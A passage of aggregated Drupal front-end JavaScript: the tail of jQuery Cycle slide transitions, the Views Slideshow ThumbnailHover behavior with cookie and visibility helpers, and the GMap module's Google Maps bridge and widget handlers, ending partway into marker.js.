w=$cont.width();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssBefore={top:h,left:w};opts.animIn={top:0,left:0};opts.animOut={top:h,left:w};};$.fn.cycle.transitions.growX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.cssBefore.left=this.cycleW/2;opts.animIn={left:0,width:this.cycleW};opts.animOut={left:0};});opts.cssBefore={width:0,top:0};};$.fn.cycle.transitions.growY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.cssBefore.top=this.cycleH/2;opts.animIn={top:0,height:this.cycleH};opts.animOut={top:0};});opts.cssBefore={height:0,left:0};};$.fn.cycle.transitions.curtainX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true,true);opts.cssBefore.left=next.cycleW/2;opts.animIn={left:0,width:this.cycleW};opts.animOut={left:curr.cycleW/2,width:0};});opts.cssBefore={top:0,width:0};};$.fn.cycle.transitions.curtainY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false,true);opts.cssBefore.top=next.cycleH/2;opts.animIn={top:0,height:next.cycleH};opts.animOut={top:curr.cycleH/2,height:0};});opts.cssBefore={left:0,height:0};};$.fn.cycle.transitions.cover=function($cont,$slides,opts){var d=opts.direction||"left";var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);if(d=="right"){opts.cssBefore.left=-w;}else{if(d=="up"){opts.cssBefore.top=h;}else{if(d=="down"){opts.cssBefore.top=-h;}else{opts.cssBefore.left=w;}}}});opts.animIn={left:0,top:0};opts.animOut={opacity:1};opts.cssBefore={top:0,left:0};};$.fn.cycle.transitions.uncover=function($cont,$slides,opts){var d=opts.direction||"left";var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);if(d=="right"){opts.animOut.left=w;}else{if(d=="up"){opts.animOut.top=-h;}else{if(d=="down"){opts.animOut.top=h;}else{opts.animOut.left=-w;}}}});opts.animIn={left:0,top:0};opts.animOut={opacity:1};opts.cssBefore={top:0,left:0};};$.fn.cycle.transitions.toss=function($cont,$slides,opts){var w=$cont.css("overflow","visible").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);if(!opts.animOut.left&&!opts.animOut.top){opts.animOut={left:w*2,top:-h/2,opacity:0};}else{opts.animOut.opacity=0;}});opts.cssBefore={left:0,top:0};opts.animIn={left:0};};$.fn.cycle.transitions.wipe=function($cont,$slides,opts){var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.cssBefore=opts.cssBefore||{};var clip;if(opts.clip){if(/l2r/.test(opts.clip)){clip="rect(0px 0px "+h+"px 0px)";}else{if(/r2l/.test(opts.clip)){clip="rect(0px "+w+"px "+h+"px "+w+"px)";}else{if(/t2b/.test(opts.clip)){clip="rect(0px "+w+"px 0px 0px)";}else{if(/b2t/.test(opts.clip)){clip="rect("+h+"px "+w+"px "+h+"px 0px)";}else{if(/zoom/.test(opts.clip)){var top=parseInt(h/2);var left=parseInt(w/2);clip="rect("+top+"px "+left+"px "+top+"px "+left+"px)";}}}}}}opts.cssBefore.clip=opts.cssBefore.clip||clip||"rect(0px 0px 0px 0px)";var d=opts.cssBefore.clip.match(/(\d+)/g);var t=parseInt(d[0]),r=parseInt(d[1]),b=parseInt(d[2]),l=parseInt(d[3]);opts.before.push(function(curr,next,opts){if(curr==next){return;}var $curr=$(curr),$next=$(next);$.fn.cycle.commonReset(curr,next,opts,true,true,false);opts.cssAfter.display="block";var step=1,count=parseInt((opts.speedIn/13))-1;(function f(){var tt=t?t-parseInt(step*(t/count)):0;var ll=l?l-parseInt(step*(l/count)):0;var bb=b<h?b+parseInt(step*((h-b)/count||1)):h;var rr=r<w?r+parseInt(step*((w-r)/count||1)):w;$next.css({clip:"rect("+tt+"px "+rr+"px "+bb+"px "+ll+"px)"});(step++<=count)?setTimeout(f,13):$curr.css("display","none");})();});opts.cssBefore={display:"block",opacity:1,top:0,left:0};opts.animIn={left:0};opts.animOut={left:0};};})(jQuery);;

/**
 * @file
 * A simple jQuery ThumbnailHover Div Slideshow Rotator.
 */

/**
 * This will set our initial behavior, by starting up each individual slideshow.
 */
Drupal.behaviors.viewsSlideshowThumbnailHover = function (context) {
  $('.views_slideshow_thumbnailhover_main:not(.viewsSlideshowThumbnailHover-processed)', context).addClass('viewsSlideshowThumbnailHover-processed').each(function() {
    var fullId = '#' + $(this).attr('id');
    if (!Drupal.settings.viewsSlideshowThumbnailHover || !Drupal.settings.viewsSlideshowThumbnailHover[fullId]) {
      return;
    }

    var settings = Drupal.settings.viewsSlideshowThumbnailHover[fullId];
    settings.targetId = '#' + $(fullId + " :first").attr('id');
		settings.paused = false;
		
    settings.opts = {
      speed:settings.speed,
      timeout:parseInt(settings.timeout),
      delay:parseInt(settings.delay),
      sync:settings.sync==1,
      random:settings.random==1,
      pause:false,
      allowPagerClickBubble:(settings.pager_event=='click')? false : true,
      pager:(settings.pager_event == 'hoverIntent') ? null : '#views_slideshow_breakout_teasers_' + settings.vss_id,
      nowrap:parseInt(settings.nowrap),
      pagerAnchorBuilder:(settings.pager_event == 'hoverIntent') ? null : function(idx, slide) { 
        return '#views_slideshow_thumbnailhover_div_breakout_teaser_' + settings.vss_id + '_' + idx; 
      },
      after:function(curr, next, opts) {
        // Used for Image Counter.
        if (settings.image_count) {
          $('#views_slideshow_thumbnailhover_image_count_' + settings.vss_id + ' span.num').html(opts.currSlide + 1);
          $('#views_slideshow_thumbnailhover_image_count_' + settings.vss_id + ' span.total').html(opts.slideCount);
        }
      },
      before:function(current, next, opts) {
        // Remember last slide.
        if (settings.remember_slide) {
          createCookie(settings.view_id, opts.currSlide + 1, settings.remember_slide_days);
        }

        // Make variable height.
        if (settings.fixed_height == 0) {
          //get the height of the current slide
          var $ht = $(this).height();
          //set the container's height to that of the current slide
          $(this).parent().animate({height: $ht});
        }
        
        var currId = (currId=$(current).attr('id')).substring(currId.lastIndexOf('_')+1)
        var nextId = (nextId=$(next).attr('id')).substring(nextId.lastIndexOf('_')+1)
        $('#views_slideshow_thumbnailhover_div_breakout_teaser_' + settings.vss_id + '_' + currId).removeClass('activeSlide');
        $('#views_slideshow_thumbnailhover_div_breakout_teaser_' + settings.vss_id + '_' + nextId).addClass('activeSlide');
      },
      pagerEvent: (settings.pager_event == 'hoverIntent') ? null : settings.pager_event,
      prev:(settings.controls > 0)?'#views_slideshow_thumbnailhover_prev_' + settings.vss_id:null,
      next:(settings.controls > 0)?'#views_slideshow_thumbnailhover_next_' + settings.vss_id:null,
      cleartype:(settings.ie.cleartype == 'true')? true : false,
      cleartypeNoBg:(settings.ie.cleartypenobg == 'true')? true : false
    };

    // Set the starting slide if we are supposed to remember the slide
    if (settings.remember_slide) {
      var startSlide = readCookie(settings.view_id);
      if (startSlide == null) {
        startSlide = 0;
      }
      settings.opts.startingSlide =  startSlide;
    }

    if (settings.effect == 'none') {
      settings.opts.speed = 1;
    }
    else {
      settings.opts.fx = settings.effect;
    }

    // Pause on hover.
    if (settings.pause == 1) {
      $('#views_slideshow_thumbnailhover_teaser_section_' + settings.vss_id).hover(function() {
        $(settings.targetId).cycle('pause');
      }, function() {
        if (settings.paused == false) {
          $(settings.targetId).cycle('resume');
        }
      });
    }

    // Pause on clicking of the slide.
    if (settings.pause_on_click == 1) {
      $('#views_slideshow_thumbnailhover_teaser_section_' + settings.vss_id).click(function() { 
        viewsSlideshowThumbnailHoverPause(settings);
      });
    }
    
    // Add additional settings.
		if (settings.advanced  && settings.advanced != "\n") {
		  settings.advanced = settings.advanced.toString();
      var advanced = settings.advanced.split("\n");
      for (i=0; i<advanced.length; i++) {
        var prop = '';
        var value = '';
        var property = advanced[i].split(":");
        for (j=0; j<property.length; j++) {
          if (j == 0) {
            prop = property[j];
          }
          else if (j == 1) {
            value = property[j];
          }
          else {
            value += ":" + property[j];
          }
        }

        // Need to evaluate so true, false and numerics aren't a string.
        if (value == 'true' || value == 'false' || IsNumeric(value)) {
          value = eval(value);
        }
        else {
          // Parse strings into functions.
          var func = value.match(/function\s*\((.*?)\)\s*\{(.*)\}/i);
          if (func) {
            value = new Function(func[1].match(/(\w+)/g), func[2]);
          }
        }
	
        // Call both functions if prop was set previously.
        if (typeof(value) == "function" && prop in settings.opts) {
          var callboth = function(before_func, new_func) {
            return function() {
              before_func.apply(null, arguments);
              new_func.apply(null, arguments);
            };
          };
          settings.opts[prop] = callboth(settings.opts[prop], value);
        }
        else {
          settings.opts[prop] = value;
        }
      }
    }

    $(settings.targetId).cycle(settings.opts);

    // Start Paused
    if (settings.start_paused) {
      viewsSlideshowThumbnailHoverPause(settings);
    }
    
    // Pause if hidden.
    if (settings.pause_when_hidden) {
      var checkPause = function(settings) {
        // If the slideshow is visible and it is paused then resume.
        // otherwise if the slideshow is not visible and it is not paused then
        // pause it.
        var visible = viewsSlideshowThumbnailHoverIsVisible(settings.targetId, settings.pause_when_hidden_type, settings.amount_allowed_visible);
        if (visible && settings.paused) {
          viewsSlideshowThumbnailHoverResume(settings);
        }
        else if (!visible && !settings.paused) {
          viewsSlideshowThumbnailHoverPause(settings);
        }
      }
     
      // Check when scrolled.
      $(window).scroll(function() {
       checkPause(settings);
      });
      
      // Check when window is resized.
      $(window).resize(function() {
        checkPause(settings);
      });
    }

    // Show image count for people who have js enabled.
    $('#views_slideshow_thumbnailhover_image_count_' + settings.vss_id).show();
    
    if (settings.pager_event == 'hoverIntent') {
      $('#views_slideshow_thumbnailhover_breakout_teasers_' + settings.vss_id + ' .views_slideshow_thumbnailhover_div_breakout_teaser').each(function(i,obj) {
        $(obj).hoverIntent(
          function() {
            $('.views_slideshow_thumbnailhover_div_breakout_teaser').removeClass('activeSlide');
            var id = $(this).attr('id');
            id = parseInt(id.substring(id.lastIndexOf('_')+1));
            $(settings.targetId).cycle(id);
            $('#views_slideshow_thumbnailhover_div_breakout_teaser_' + settings.vss_id + '_' + id).addClass('activeSlide');
            $(settings.targetId).cycle('stop');
          },
          function() {
            var id = $(this).attr('id');
            settings.opts.startingSlide = parseInt(id.substring(id.lastIndexOf('_')+1));
            $(settings.targetId).cycle(settings.opts);
          }
        );
      });
    }

    if (settings.controls > 0) {
      // Show controls for people who have js enabled browsers.
      $('#views_slideshow_thumbnailhover_controls_' + settings.vss_id).show();
      
      $('#views_slideshow_thumbnailhover_playpause_' + settings.vss_id).click(function(e) {
        if (settings.paused) {
          viewsSlideshowThumbnailHoverResume(settings);
        }
        else {
          viewsSlideshowThumbnailHoverPause(settings);
        }
        e.preventDefault();
      });
    }
  });
}

// Pause the slideshow 
viewsSlideshowThumbnailHoverPause = function (settings) {
  //make Resume translatable
  var resume = Drupal.t('Resume');

  $(settings.targetId).cycle('pause');
  if (settings.controls > 0) {
    $('#views_slideshow_thumbnailhover_playpause_' + settings.vss_id)
      .addClass('views_slideshow_thumbnailhover_play')
      .addClass('views_slideshow_play')
      .removeClass('views_slideshow_thumbnailhover_pause')
      .removeClass('views_slideshow_pause')
      .text(resume);
  }
  settings.paused = true;
}

// Resume the slideshow
viewsSlideshowThumbnailHoverResume = function (settings) {
  // Make Pause translatable
  var pause = Drupal.t('Pause');
  
  $(settings.targetId).cycle('resume');
  if (settings.controls > 0) {
    $('#views_slideshow_thumbnailhover_playpause_' + settings.vss_id)
      .addClass('views_slideshow_thumbnailhover_pause')
      .addClass('views_slideshow_pause')
      .removeClass('views_slideshow_thumbnailhover_play')
      .removeClass('views_slideshow_play')
      .text(pause);
  }
  settings.paused = false;
}

// Verify that the value is a number.
function IsNumeric(sText) {
  var ValidChars = "0123456789";
  var IsNumber=true;
  var Char;

  for (var i=0; i < sText.length && IsNumber == true; i++) { 
    Char = sText.charAt(i); 
    if (ValidChars.indexOf(Char) == -1) {
      IsNumber = false;
    }
  }
  return IsNumber;
}

/**
 * Cookie Handling Functions
 */
function createCookie(name,value,days) {
  if (days) {
    var date = new Date();
    date.setTime(date.getTime()+(days*24*60*60*1000));
    var expires = "; expires="+date.toGMTString();
  }
  else {
    var expires = "";
  }
  document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name) {
  var nameEQ = name + "=";
  var ca = document.cookie.split(';');
  for(var i=0;i < ca.length;i++) {
    var c = ca[i];
    while (c.charAt(0)==' ') c = c.substring(1,c.length);
    if (c.indexOf(nameEQ) == 0) {
      return c.substring(nameEQ.length,c.length);
    }
  }
  return null;
}

function eraseCookie(name) {
  createCookie(name,"",-1);
}

/**
 * Checks to see if the slide is visible enough.
 * elem = element to check.
 * amountVisible = amount that should be visible. Either in percent or px. If
 *                it's not defined then all of the slide must be visible.
 *
 * Returns true or false
 */
function viewsSlideshowThumbnailHoverIsVisible(elem, type, amountVisible) {
  // Get the top and bottom of the window;
  var docViewTop = $(window).scrollTop();
  var docViewBottom = docViewTop + $(window).height();
  var docViewLeft = $(window).scrollLeft();
  var docViewRight = docViewLeft + $(window).width();

  // Get the top, bottom, and height of the slide;
  var elemTop = $(elem).offset().top;
  var elemHeight = $(elem).height();
  var elemBottom = elemTop + elemHeight;
  var elemLeft = $(elem).offset().left;
  var elemWidth = $(elem).width();
  var elemRight = elemLeft + elemWidth;
  var elemArea = elemHeight * elemWidth;
  
  // Calculate what's hiding in the slide.
  var missingLeft = 0;
  var missingRight = 0;
  var missingTop = 0;
  var missingBottom = 0;
  
  // Find out how much of the slide is missing from the left.
  if (elemLeft < docViewLeft) {
    missingLeft = docViewLeft - elemLeft;
  }

  // Find out how much of the slide is missing from the right.
  if (elemRight > docViewRight) {
    missingRight = elemRight - docViewRight;
  }
  
  // Find out how much of the slide is missing from the top.
  if (elemTop < docViewTop) {
    missingTop = docViewTop - elemTop;
  }

  // Find out how much of the slide is missing from the bottom.
  if (elemBottom > docViewBottom) {
    missingBottom = elemBottom - docViewBottom;
  }
  
  // If there is no amountVisible defined then check to see if the whole slide
  // is visible.
  if (type == 'full') {
    return ((elemBottom >= docViewTop) && (elemTop <= docViewBottom)
    && (elemBottom <= docViewBottom) &&  (elemTop >= docViewTop)
    && (elemLeft >= docViewLeft) && (elemRight <= docViewRight)
    && (elemLeft <= docViewRight) && (elemRight >= docViewLeft));
  }
  else if(type == 'vertical') {
    var verticalShowing = elemHeight - missingTop - missingBottom;
    
    // If user specified a percentage then find out if the current shown percent
    // is larger than the allowed percent.
    // Otherwise check to see if the amount of px shown is larger than the
    // allotted amount.
    if (amountVisible.indexOf('%')) {
      return (((verticalShowing/elemHeight)*100) >= parseInt(amountVisible));
    }
    else {
      return (verticalShowing >= parseInt(amountVisible));
    }
  }
  else if(type == 'horizontal') {
    var horizontalShowing = elemWidth - missingLeft - missingRight;
    
    // If user specified a percentage then find out if the current shown percent
    // is larger than the allowed percent.
    // Otherwise check to see if the amount of px shown is larger than the
    // allotted amount.
    if (amountVisible.indexOf('%')) {
      return (((horizontalShowing/elemWidth)*100) >= parseInt(amountVisible));
    }
    else {
      return (horizontalShowing >= parseInt(amountVisible));
    }
  }
  else if(type == 'area') {
    var areaShowing = (elemWidth - missingLeft - missingRight) * (elemHeight - missingTop - missingBottom);
    
    // If user specified a percentage then find out if the current shown percent
    // is larger than the allowed percent.
    // Otherwise check to see if the amount of px shown is larger than the
    // allotted amount.
    if (amountVisible.indexOf('%')) {
      return (((areaShowing/elemArea)*100) >= parseInt(amountVisible));
    }
    else {
      return (areaShowing >= parseInt(amountVisible));
    }
  }
}
;
/* $Id: gmap.js,v 1.16.2.1 2010/04/08 13:40:19 rooby Exp $ */

/**
 * @file
 * Drupal to Google Maps API bridge.
 */

/*global $, Drupal, GLatLng, GSmallZoomControl, GLargeMapControl, GMap2 */
/*global GMapTypeControl, GSmallMapControl, G_HYBRID_MAP, G_NORMAL_MAP */
/*global G_PHYSICAL_MAP, G_SATELLITE_MAP, GHierarchicalMapTypeControl */
/*global GKeyboardHandler, GLatLngBounds, GMenuMapTypeControl, GEvent */
/*global GOverviewMapControl, GScaleControl, GUnload */

(function () { // BEGIN closure
  var handlers = {};
  var maps = {};
  var ajaxoffset = 0;

  Drupal.gmap = {

    /**
     * Retrieve a map object for use by a non-widget.
     * Use this if you need to be able to fire events against a certain map
     * which you have the mapid for.
     * Be a good GMap citizen! Remember to send change()s after modifying variables!
     */
    getMap: function (mapid) {
      if (maps[mapid]) {
        return maps[mapid];
      }
      else {
        // Perhaps the user passed a widget id instead?
        mapid = mapid.split('-').slice(1, -1).join('-');
        if (maps[mapid]) {
          return maps[mapid];
        }
      }
      return false;
    },

    unloadMap: function (mapid) {
      delete maps[mapid];
    },

    addHandler: function (handler, callback) {
      if (!handlers[handler]) {
        handlers[handler] = [];
      }
      handlers[handler].push(callback);
    },

    globalChange: function (name, userdata) {
      for (var mapid in Drupal.settings.gmap) {
        if (Drupal.settings.gmap.hasOwnProperty(mapid)) {
          maps[mapid].change(name, -1, userdata);
        }
      }
    },

    setup: function (settings) {
      var obj = this;

      var initcallback = function (mapid) {
        return (function () {
          maps[mapid].change("bootstrap_options", -1);
          maps[mapid].change("boot", -1);
          maps[mapid].change("init", -1);
          // Send some changed events to fire up the rest of the initial settings..
          maps[mapid].change("maptypechange", -1);
          maps[mapid].change("controltypechange", -1);
          maps[mapid].change("alignchange", -1);
          // Set ready to put the event system into action.
          maps[mapid].ready = true;
          maps[mapid].change("ready", -1);
        });
      };

      if (settings || (Drupal.settings && Drupal.settings.gmap)) {
        var mapid = obj.id.split('-');
        if (Drupal.settings['gmap_remap_widgets']) {
          if (Drupal.settings['gmap_remap_widgets'][obj.id]) {
            jQuery.each(Drupal.settings['gmap_remap_widgets'][obj.id].classes, function() {
              jQuery(obj).addClass(this);
            });
            mapid = Drupal.settings['gmap_remap_widgets'][obj.id].id.split('-');
          }
        }
        var instanceid = mapid.pop();
        mapid.shift();
        mapid = mapid.join('-');
        var control = instanceid.replace(/\d+$/, '');

        // Lazy init the map object.
        if (!maps[mapid]) {
          if (settings) {
            maps[mapid] = new Drupal.gmap.map(settings);
          }
          else {
            maps[mapid] = new Drupal.gmap.map(Drupal.settings.gmap[mapid]);
          }
          // Prepare the initialization callback.
          var callback = initcallback(mapid);
          setTimeout(callback, 0);
        }

        if (handlers[control]) {
          for (var i = 0; i < handlers[control].length; i++) {
            handlers[control][i].call(maps[mapid], obj);
          }
        }
        else {
          // Element with wrong class?
        }
      }
    }
  };

  jQuery.fn.createGMap = function (settings, mapid) {
    return this.each(function () {
      if (!mapid) {
        mapid = 'auto' + ajaxoffset + 'ajax';
        ajaxoffset++;
      }
      settings.id = mapid;
      $(this)
        .attr('id', 'gmap-' + mapid + '-gmap0')
        .css('width', settings.width)
        .css('height', settings.height)
        .addClass('gmap-control')
        .addClass('gmap-gmap')
        .addClass('gmap')
        .addClass('gmap-map')
        .addClass('gmap-' + mapid + '-gmap')
        .addClass('gmap-processed')
        .each(function() {Drupal.gmap.setup.call(this, settings)});
    });
  };

})(); // END closure

Drupal.gmap.factory = {};

Drupal.gmap.map = function (v) {
  this.vars = v;
  this.map = undefined;
  this.ready = false;
  var _bindings = {};

  /**
   * Register interest in a change.
   */
  this.bind = function (name, callback) {
    if (!_bindings[name]) {
      _bindings[name] = [];
    }
    return _bindings[name].push(callback) - 1;
  };

  /**
   * Change notification.
   * Interested parties can act on changes.
   */
  this.change = function (name, id, userdata) {
    var c;
    if (_bindings[name]) {
      for (c = 0; c < _bindings[name].length; c++) {
        if (c !== id) {
          _bindings[name][c](userdata);
        }
      }
    }
    if (name !== 'all') {
      this.change('all', -1, name, userdata);
    }
  };

  /**
   * Deferred change notification.
   * This will cause a change notification to be tacked on to the *end* of the event queue.
   */
  this.deferChange = function (name, id, userdata) {
    var obj = this;
    // This will move the function call to the end of the event loop.
    setTimeout(function () {
      obj.change(name, id, userdata);
    }, 0);
  };
};

////////////////////////////////////////
//             Map widget             //
////////////////////////////////////////
Drupal.gmap.addHandler('gmap', function (elem) {
  var obj = this;

  var _ib = {};


  // Respond to incoming zooms
  _ib.zoom = obj.bind("zoom", function () {
    obj.map.setZoom(obj.vars.zoom);
  });

  // Respond to incoming moves
  _ib.move = obj.bind("move", function () {
    obj.map.panTo(new GLatLng(obj.vars.latitude, obj.vars.longitude));
  });

  // Respond to incoming map type changes
  _ib.mtc = obj.bind("maptypechange", function () {
    var i;
    for (i = 0; i < obj.opts.mapTypeNames.length; i++) {
      if (obj.opts.mapTypeNames[i] === obj.vars.maptype) {
        obj.map.setMapType(obj.opts.mapTypes[i]);
        break;
      }
    }
  });

  // Respond to incoming width changes.
  _ib.width = obj.bind("widthchange", function (w) {
    obj.map.getContainer().style.width = w;
    obj.map.checkResize();
  });
  // Send out outgoing width changes.
  // N/A
  // Respond to incoming height changes.
  _ib.height = obj.bind("heightchange", function (h) {
    obj.map.getContainer().style.height = h;
    obj.map.checkResize();
  });
  // Send out outgoing height changes.
  // N/A

  // Respond to incoming control type changes.
  _ib.ctc = obj.bind("controltypechange", function () {
    if (obj.currentcontrol) {
      obj.map.removeControl(obj.currentcontrol);
    }
    if (obj.vars.controltype === 'Micro') {
      obj.map.addControl(obj.currentcontrol = new GSmallZoomControl());
    }
    else if (obj.vars.controltype === 'Small') {
      obj.map.addControl(obj.currentcontrol = new GSmallMapControl());
    }
    else if (obj.vars.controltype === 'Large') {
      obj.map.addControl(obj.currentcontrol = new GLargeMapControl());
    }
  });
  // Send out outgoing control type changes.
  // N/A

  obj.bind("bootstrap_options", function () {
    // Bootup options.
    var opts = {}; // Object literal GMapOptions
    obj.opts = opts;

    // Null out the enabled types.
    opts.mapTypes = [];
    opts.mapTypeNames = [];

    // Load google map types.
    if (obj.vars.baselayers.Map) {
      opts.mapTypes.push(G_NORMAL_MAP);
      opts.mapTypeNames.push('Map');
    }
    if (obj.vars.baselayers.Satellite) {
      opts.mapTypes.push(G_SATELLITE_MAP);
      opts.mapTypeNames.push('Satellite');
    }
    if (obj.vars.baselayers.Hybrid) {
      opts.mapTypes.push(G_HYBRID_MAP);
      opts.mapTypeNames.push('Hybrid');
    }
    if (obj.vars.baselayers.Physical) {
      opts.mapTypes.push(G_PHYSICAL_MAP);
      opts.mapTypeNames.push('Physical');
    }

  });

  obj.bind("boot", function () {
    obj.map = new GMap2(elem, obj.opts);
  });

  obj.bind("init", function () {
    var map = obj.map;

    // Map type control
    if (obj.vars.mtc === 'standard') {
      map.addControl(new GMapTypeControl());
    }
    else if (obj.vars.mtc === 'hier') {
      map.addControl(new GHierarchicalMapTypeControl());
    }
    else if (obj.vars.mtc === 'menu') {
      map.addControl(new GMenuMapTypeControl());
    }

    if (obj.vars.behavior.overview) {
      map.addControl(new GOverviewMapControl());
    }
    if (obj.vars.behavior.googlebar) {
      map.enableGoogleBar();
    }
    if (obj.vars.behavior.scale) {
      map.addControl(new GScaleControl());
    }
    if (obj.vars.behavior.nodrag) {
      map.disableDragging();
    }
    else if (!obj.vars.behavior.nokeyboard) {
      obj._kbdhandler = new GKeyboardHandler(map);
    }
    if (obj.vars.extent) {
      var c = obj.vars.extent;
      var extent = new GLatLngBounds(new GLatLng(c[0][0], c[0][1]), new GLatLng(c[1][0], c[1][1]));
      obj.vars.latitude = extent.getCenter().lat();
      obj.vars.longitude = extent.getCenter().lng();
      obj.vars.zoom = map.getBoundsZoomLevel(extent);
    }
    if (obj.vars.behavior.collapsehack) {
      // Modify collapsable fieldsets to make maps check dom state when the resize handle
      // is clicked. This may not necessarily be the correct thing to do in all themes,
      // hence it being a behavior.
      setTimeout(function () {
        var r = function () {
          map.checkResize();
          map.setCenter(new GLatLng(obj.vars.latitude, obj.vars.longitude), obj.vars.zoom);
        };
        $(elem).parents('fieldset.collapsible').children('legend').children('a').click(r);
        // Would be nice, but doesn't work.
        //$(elem).parents('fieldset.collapsible').children('.fieldset-wrapper').scroll(r);
      }, 0);
    }
    map.setCenter(new GLatLng(obj.vars.latitude, obj.vars.longitude), obj.vars.zoom);

    if (!obj.vars.nocontzoom) {
      map.enableDoubleClickZoom();
      map.enableContinuousZoom();
    }
    if (!obj.vars.behavior.nomousezoom) {
      map.enableScrollWheelZoom();
    }

    // Send out outgoing zooms
    GEvent.addListener(map, "zoomend", function (oldzoom, newzoom) {
      obj.vars.zoom = newzoom;
      obj.change("zoom", _ib.zoom);
    });

    // Send out outgoing moves
    GEvent.addListener(map, "moveend", function () {
      var coord = map.getCenter();
      obj.vars.latitude = coord.lat();
      obj.vars.longitude = coord.lng();
      obj.change("move", _ib.move);
    });

    // Send out outgoing map type changes.
    GEvent.addListener(map, "maptypechanged", function () {
      // If the map isn't ready yet, ignore it.
      if (obj.ready) {
        var type = map.getCurrentMapType();
        var i;
        for (i = 0; i < obj.opts.mapTypes.length; i++) {
          if (obj.opts.mapTypes[i] === type) {
            obj.vars.maptype = obj.opts.mapTypeNames[i];
          }
        }
        obj.change("maptypechange", _ib.mtc);
      }
    });

  });
});

////////////////////////////////////////
//            Zoom widget             //
////////////////////////////////////////
Drupal.gmap.addHandler('zoom', function (elem) {
  var obj = this;
  // Respond to incoming zooms
  var binding = obj.bind("zoom", function () {
    elem.value = obj.vars.zoom;
  });
  // Send out outgoing zooms
  $(elem).change(function () {
    obj.vars.zoom = parseInt(elem.value, 10);
    obj.change("zoom", binding);
  });
});

////////////////////////////////////////
//          Latitude widget           //
////////////////////////////////////////
Drupal.gmap.addHandler('latitude', function (elem) {
  var obj = this;
  // Respond to incoming movements.
  var binding = obj.bind("move", function () {
    elem.value = '' + obj.vars.latitude;
  });
  // Send out outgoing movements.
  $(elem).change(function () {
    obj.vars.latitude = Number(this.value);
    obj.change("move", binding);
  });
});

////////////////////////////////////////
//         Longitude widget           //
////////////////////////////////////////
Drupal.gmap.addHandler('longitude', function (elem) {
  var obj = this;
  // Respond to incoming movements.
  var binding = obj.bind("move", function () {
    elem.value = '' + obj.vars.longitude;
  });
  // Send out outgoing movements.
  $(elem).change(function () {
    obj.vars.longitude = Number(this.value);
    obj.change("move", binding);
  });
});

////////////////////////////////////////
//          Latlon widget             //
////////////////////////////////////////
Drupal.gmap.addHandler('latlon', function (elem) {
  var obj = this;
  // Respond to incoming movements.
  var binding = obj.bind("move", function () {
    elem.value = '' + obj.vars.latitude + ',' + obj.vars.longitude;
  });
  // Send out outgoing movements.
  $(elem).change(function () {
    var t = this.value.split(',');
    obj.vars.latitude = Number(t[0]);
    obj.vars.longitude = Number(t[1]);
    obj.change("move", binding);
  });
});

////////////////////////////////////////
//          Maptype widget            //
////////////////////////////////////////
Drupal.gmap.addHandler('maptype', function (elem) {
  var obj = this;
  // Respond to incoming movements.
  var binding = obj.bind("maptypechange", function () {
    elem.value = obj.vars.maptype;
  });
  // Send out outgoing movements.
  $(elem).change(function () {
    obj.vars.maptype = elem.value;
    obj.change("maptypechange", binding);
  });
});

(function () { // BEGIN CLOSURE
  var re = /([0-9.]+)\s*(em|ex|px|in|cm|mm|pt|pc|%)/;
  var normalize = function (str) {
    var ar;
    if ((ar = re.exec(str.toLowerCase()))) {
      return ar[1] + ar[2];
    }
    return null;
  };
  ////////////////////////////////////////
  //           Width widget             //
  ////////////////////////////////////////
  Drupal.gmap.addHandler('width', function (elem) {
    var obj = this;
    // Respond to incoming width changes.
    var binding = obj.bind("widthchange", function (w) {
      elem.value = normalize(w);
    });
    // Send out outgoing width changes.
    $(elem).change(function () {
      var n;
      if ((n = normalize(elem.value))) {
        elem.value = n;
        obj.change('widthchange', binding, n);
      }
    });
    obj.bind('init', function () {
      $(elem).change();
    });
  });

  ////////////////////////////////////////
  //           Height widget            //
  ////////////////////////////////////////
  Drupal.gmap.addHandler('height', function (elem) {
    var obj = this;
    // Respond to incoming height changes.
    var binding = obj.bind("heightchange", function (h) {
      elem.value = normalize(h);
    });
    // Send out outgoing height changes.
    $(elem).change(function () {
      var n;
      if ((n = normalize(elem.value))) {
        elem.value = n;
        obj.change('heightchange', binding, n);
      }
    });
    obj.bind('init', function () {
      $(elem).change();
    });
  });

})(); // END CLOSURE

////////////////////////////////////////
//        Control type widget         //
////////////////////////////////////////
Drupal.gmap.addHandler('controltype', function (elem) {
  var obj = this;
  // Respond to incoming height changes.
  var binding = obj.bind("controltypechange", function () {
    elem.value = obj.vars.controltype;
  });
  // Send out outgoing height changes.
  $(elem).change(function () {
    obj.vars.controltype = elem.value;
    obj.change("controltypechange", binding);
  });
});

// Map cleanup.
if (Drupal.jsEnabled) {
  $(document).unload(GUnload);
}

Drupal.behaviors.GMap = function (context) {
  if (Drupal.settings && Drupal.settings['gmap_remap_widgets']) {
    jQuery.each(Drupal.settings['gmap_remap_widgets'], function(key, val) {
      $('#'+ key).addClass('gmap-control');
    });
  }
  $('.gmap-control:not(.gmap-processed)', context).addClass('gmap-processed').each(function () {Drupal.gmap.setup.call(this)});
};
;
/* $Id: marker.js,v 1.4.2.1 2010/04/08 13:40:19 rooby Exp $ */

/**
 * @file
 * Common marker routines.
 */

/*global $, Drupal, GEvent, GInfoWindowTab, GLatLng, GLatLngBounds */

Drupal.gmap.addHandler('gmap', function (elem) {
  var obj = this;

  obj.bind('init', function () {
    if (obj.vars.behavior.autozoom) {
      obj.bounds = new GLatLngBounds();
    }
  });

  obj.bind('addmarker', function (marker) {
    var m = Drupal.gmap.factory.marker(new GLatLng(marker.latitude, marker.longitude), marker.opts);
    marker.marker = m;
    GEvent.addListener(m, 'click', function () {
      obj.change('clickmarker', -1, marker);
    });
    if (obj.vars.behavior.highlight) {
